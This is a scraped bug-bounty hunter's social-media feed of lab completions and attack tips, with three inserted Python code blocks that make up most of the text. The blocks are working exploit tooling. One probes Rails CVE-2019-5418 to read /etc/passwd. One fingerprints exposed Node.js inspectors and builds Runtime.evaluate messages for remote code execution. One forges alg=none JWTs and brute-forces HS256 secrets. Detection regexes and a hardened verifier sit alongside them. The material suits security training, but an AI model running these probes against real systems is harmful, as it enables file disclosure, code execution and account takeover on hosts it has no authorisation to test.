
Muhammad Sarim Raza
@hackipy
Breaking Security Legally
I completed the Web Security Academy lab: Exploiting server-side parameter pollution in a REST URL @WebSecAcademy portswigger.net/web-security/a…
Interesting technique by @j_zere: When a cache deception requires a specific header/token that you can't directly provide, try chaining it with CSPT to make it exploitable.

A Novel Technique for SQL Injection in PDO’s Prepared Statements - @assetnote slcyber.io/assetnote-secu…
slcyber.io: Novel SQL Injection Technique in PDO Prepared Statements. Searchlight Cyber's Security Research team details a novel technique for SQL injection in PDO's prepared statements.
I completed the Web Security Academy lab: Exploiting a mass assignment vulnerability @WebSecAcademy portswigger.net/web-security/a…
I completed the Web Security Academy lab: Finding and exploiting an unused API endpoint @WebSecAcademy portswigger.net/web-security/a…
I completed the Web Security Academy lab: Exploiting an API endpoint using documentation @WebSecAcademy portswigger.net/web-security/a…
I completed the Web Security Academy lab: Exploiting server-side parameter pollution in a query string @WebSecAcademy portswigger.net/web-security/a…
I researched Ruby class pollution and discovered a new exploitation method, Rotate Chains, achieving a 100% exploit success rate; I also created a bi0s CTF 2025 challenge based on the technique, which had 0 solves. Read the research/writeup: winters0x64.xyz/posts/post-2
I don’t get why bug hunters tweet stuff like ‘Had a great month’ and post a screenshot with everything censored… and the reports aren’t even triaged yet. Thanks to HackerOne for that trailing dot showing the status of every report. What exactly are you trying to show?
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips
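The tip above in working form, as an added example that is not @hackipy's own code: a probe builder that produces the traversal `Accept` header, a heuristic that decides whether a response body is really `/etc/passwd` rather than a 404 page, and, for the defensive side, a check that flags the same payload in request logs. The log line format and the sample response body are constructed for the example; the `probe()` function makes a real HTTP request and should only be pointed at hosts you are authorised to test.

```python
"""Added example (not from the post): CVE-2019-5418 probe and response check."""
import re
import urllib.request
from typing import List, Optional

# Action View interpolated the Accept value into its template lookup, so a
# traversal path terminated by "{{" is read back as the response body.
# Ten "../" segments, as in the post, are enough to reach "/" from any
# realistic Rails app directory.
DEFAULT_DEPTH = 10

# One passwd line: name:pass:uid:gid:gecos:home:shell (7 colon-separated fields).
PASSWD_LINE = re.compile(
    r"^[^:\s]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M
)

# Defender side: traversal segments followed somewhere by the "{{" terminator.
ACCEPT_TRAVERSAL = re.compile(r"(\.\./){2,}.*\{\{")

# Constructed log format for the example: ... accept="<header value>"
LOG_ACCEPT = re.compile(r'accept="([^"]*)"')


def build_probe_headers(target_file: str = "etc/passwd",
                        depth: int = DEFAULT_DEPTH) -> dict:
    """Headers for the disclosure probe; target_file is relative to '/'."""
    accept = "../" * depth + target_file.lstrip("/") + "{{"
    return {"Accept": accept, "User-Agent": "cve-2019-5418-check"}


def looks_like_passwd(body: str) -> bool:
    """True if the body contains a root entry plus at least one more passwd line."""
    lines = PASSWD_LINE.findall(body)
    return len(lines) >= 2 and any(line.startswith("root:") for line in lines)


def probe(url: str, timeout: float = 10.0) -> Optional[str]:
    """Send the probe; return the body if it looks like /etc/passwd, else None.
    Network call, not exercised offline."""
    req = urllib.request.Request(url, headers=build_probe_headers())
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", "replace")
    return body if looks_like_passwd(body) else None


def suspicious_accept(accept_header: str) -> bool:
    """Detection: does this Accept value carry the traversal payload?"""
    return bool(ACCEPT_TRAVERSAL.search(accept_header))


def flag_log_lines(lines: List[str]) -> List[str]:
    """Return the log lines whose accept="..." field carries the payload."""
    flagged = []
    for line in lines:
        m = LOG_ACCEPT.search(line)
        if m and suspicious_accept(m.group(1)):
            flagged.append(line)
    return flagged


# Constructed sample data for offline use.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)
SAMPLE_LOG = [
    '10.0.0.9 "GET /articles/1 HTTP/1.1" 200 accept="text/html,*/*"',
    '10.0.0.9 "GET /articles/1 HTTP/1.1" 200 accept="'
    + build_probe_headers()["Accept"] + '"',
]

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        print("vulnerable" if probe(sys.argv[1]) else "no disclosure observed")
    else:
        print(build_probe_headers()["Accept"])
        print(flag_log_lines(SAMPLE_LOG))
```

`looks_like_passwd()` is what separates a real hit from a Rails error page that merely echoes the header back, which is the usual false positive when scanning with this payload.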

I completed the Web Security Academy lab: JWT authentication bypass via algorithm confusion with no exposed key @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via algorithm confusion @WebSecAcademy portswigger.net/web-security/j…
Bug Hunters 🔥 Ever stumbled upon this weird message? "WebSockets request was expected" If you did, congrats! You just found a Node.js server in debug mode, ready to quickly move on to RCE via simple DevTools 💥💥💥 Search for this message in Censys/FOFA and your automation 🤑
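What that message means in practice, as an added example and not the poster's own tooling: Node started with `--inspect` serves the Chrome DevTools Protocol on port 9229 by default, answers any non-WebSocket request with exactly that banner, and lists its debuggable targets as JSON on `/json/list` (alias `/json`). Once you have a target's `webSocketDebuggerUrl`, a single `Runtime.evaluate` message runs arbitrary JavaScript in the process, which is the "RCE via DevTools" the post refers to. The code below recognises the banner, parses the target list, and builds and parses the CDP exchange; the sample `/json/list` body and the reply are constructed for the example, and no WebSocket client is included.

```python
"""Added example (not from the post): fingerprint an exposed Node.js inspector."""
import json
from typing import Any, Dict, List

INSPECTOR_BANNER = "WebSockets request was expected"
DEFAULT_PORT = 9229  # node --inspect default


def is_inspector_banner(body: str) -> bool:
    """The body Node's inspector returns for a plain HTTP request to a non-discovery path."""
    return INSPECTOR_BANNER in body


def discovery_urls(host: str, port: int = DEFAULT_PORT) -> Dict[str, str]:
    """The two discovery endpoints the inspector exposes over plain HTTP."""
    base = f"http://{host}:{port}"
    return {"version": f"{base}/json/version", "list": f"{base}/json/list"}


def parse_inspector_targets(json_list_body: str) -> List[Dict[str, str]]:
    """Parse /json/list and keep the node targets DevTools would attach to."""
    try:
        data = json.loads(json_list_body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, list):
        return []
    targets = []
    for entry in data:
        ws = entry.get("webSocketDebuggerUrl")
        if entry.get("type") == "node" and ws:
            targets.append({
                "id": entry.get("id", ""),
                "title": entry.get("title", ""),
                "ws": ws,
            })
    return targets


def cdp_evaluate(expression: str, msg_id: int = 1) -> str:
    """Build a Runtime.evaluate message. Whatever `expression` contains runs
    inside the target process, so only send it to systems you are authorised to test."""
    return json.dumps({
        "id": msg_id,
        "method": "Runtime.evaluate",
        "params": {"expression": expression, "returnByValue": True},
    })


def cdp_result_value(reply_body: str) -> Any:
    """Pull result.result.value out of a Runtime.evaluate reply, or raise on a CDP error."""
    reply = json.loads(reply_body)
    if "error" in reply:
        raise RuntimeError(reply["error"].get("message", "CDP error"))
    return reply["result"]["result"].get("value")


# Constructed sample: the shape Node serves, with made-up host and target id.
SAMPLE_JSON_LIST = json.dumps([{
    "description": "node.js instance",
    "devtoolsFrontendUrl": "devtools://devtools/bundled/js_app.html?experiments=true"
                           "&v8only=true&ws=10.0.0.5:9229/0d8b3e1a-1111-4222-8333-444455556666",
    "id": "0d8b3e1a-1111-4222-8333-444455556666",
    "title": "app.js",
    "type": "node",
    "url": "file:///srv/app/app.js",
    "webSocketDebuggerUrl": "ws://10.0.0.5:9229/0d8b3e1a-1111-4222-8333-444455556666",
}])

# Constructed sample reply to cdp_evaluate("process.version").
SAMPLE_CDP_REPLY = json.dumps({
    "id": 1, "result": {"result": {"type": "string", "value": "v18.19.0"}}
})

if __name__ == "__main__":
    print(discovery_urls("10.0.0.5"))
    for t in parse_inspector_targets(SAMPLE_JSON_LIST):
        print("target", t["id"], "->", t["ws"])
    print(cdp_evaluate("process.version"))
    print(cdp_result_value(SAMPLE_CDP_REPLY))
```

For triage, `process.version` or `process.cwd()` is enough to prove execution without touching the host; save anything heavier for a report the program has agreed to.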


Just dropped a new video on Web Cache Deception to Account Takeover, packed with powerful bypass techniques. Don't miss it! youtu.be/Epzi1fWwdKk?si…
youtube.com: Mastering Web Cache Deception: From Exploit to Account Takeover, a...
I completed the Web Security Academy lab: JWT authentication bypass via kid header path traversal @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via jku header injection @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via jwk header injection @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via weak signing key @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via flawed signature verification @WebSecAcademy portswigger.net/web-security/j…
I completed the Web Security Academy lab: JWT authentication bypass via unverified signature @WebSecAcademy portswigger.net/web-security/j…
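The JWT labs listed above share three of the same root causes, shown here in a standard-library-only example added for this page (not lab code and not @hackipy's): a server that decodes the payload without checking the signature, a server whose verifier honours the token's own `alg` header and therefore accepts `alg: none` with an empty signature, and an HS256 secret weak enough to recover with a wordlist. A hardened verifier that pins the algorithm and compares in constant time sits beside them. The key, claims and wordlist are constructed; algorithm confusion and the `kid`/`jku`/`jwk` header attacks need RSA and are not covered.

```python
"""Added example (not from the labs): minimal HS256 JWTs, three weak verifiers, one hardened."""
import base64
import hashlib
import hmac
import json
from typing import Any, Dict, Iterable, Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _json(obj: Dict[str, Any]) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def sign_hs256(payload: Dict[str, Any], key: bytes) -> str:
    """Issue a correctly signed HS256 token."""
    signing_input = _b64url(_json({"alg": "HS256", "typ": "JWT"})) + "." + _b64url(_json(payload))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def decode_unverified(token: str) -> Dict[str, Any]:
    """Flaw: "unverified signature". Trusts whatever the payload says."""
    _, payload_b64, _ = token.split(".")
    return json.loads(_b64url_decode(payload_b64))


def verify_trusting_header_alg(token: str, key: bytes) -> Optional[Dict[str, Any]]:
    """Flaw: "flawed signature verification". Lets the token choose its algorithm,
    so alg=none with an empty signature is accepted."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(_b64url_decode(payload_b64))
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return json.loads(_b64url_decode(payload_b64))
    return None


def forge_alg_none(payload: Dict[str, Any]) -> str:
    """Attacker side for the flaw above: unsigned token with alg=none."""
    return _b64url(_json({"alg": "none", "typ": "JWT"})) + "." + _b64url(_json(payload)) + "."


def brute_force_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Flaw: "weak signing key". Offline dictionary attack on the HMAC secret."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    target = _b64url_decode(sig_b64)
    msg = f"{header_b64}.{payload_b64}".encode()
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), msg, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def verify_hardened(token: str, key: bytes) -> Optional[Dict[str, Any]]:
    """Server pins HS256, ignores the header's choice, compares in constant time."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":  # rejects none, RS256, anything unexpected
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(_b64url_decode(payload_b64))


# Constructed demo data: a deliberately weak secret and a tiny wordlist.
WEAK_KEY = b"secret1"
WORDLIST = ["password", "secret", "secret1", "letmein"]

if __name__ == "__main__":
    tok = sign_hs256({"sub": "wiener", "admin": False}, WEAK_KEY)
    forged = forge_alg_none({"sub": "administrator", "admin": True})
    print("unverified decoder trusts forged token:", decode_unverified(forged))
    print("alg-trusting verifier accepts alg=none:", verify_trusting_header_alg(forged, WEAK_KEY))
    print("recovered secret:", brute_force_hs256(tok, WORDLIST))
    print("hardened verifier on forged token:", verify_hardened(forged, WEAK_KEY))
```

The brute-force step is exactly why a recovered secret turns a weak-key finding into a full forgery: with `WEAK_KEY` in hand an attacker calls `sign_hs256()` with any claims they like and `verify_hardened()` cannot tell the difference.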